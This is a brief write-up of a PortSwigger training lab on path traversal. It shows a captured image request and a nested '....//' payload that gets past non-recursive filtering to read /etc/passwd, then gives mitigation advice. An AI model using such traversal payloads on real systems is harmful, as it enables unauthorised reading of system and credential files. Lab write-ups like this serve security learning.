PortSwigger Lab: File path traversal, traversal sequences stripped non-recursively
Task
This lab contains a path traversal vulnerability in the display of product images.
The application strips path traversal sequences from the user-supplied filename before using it.
To solve the lab, retrieve the contents of the /etc/passwd file.
Attempt
Set intercept on and opened a product image in a new tab.
Captured request:
GET /image?filename=75.jpg
Tried a simple payload:
../../../../etc/passwd
The page gave an error no such file.
I used mangled path.
....//....//....//....//etc/passwd
Worked like a charm.
Mitigation
Do not allow users to specify file names directory. Whitelist valid files or directories. Normalize file paths (e.g. realpath() in php)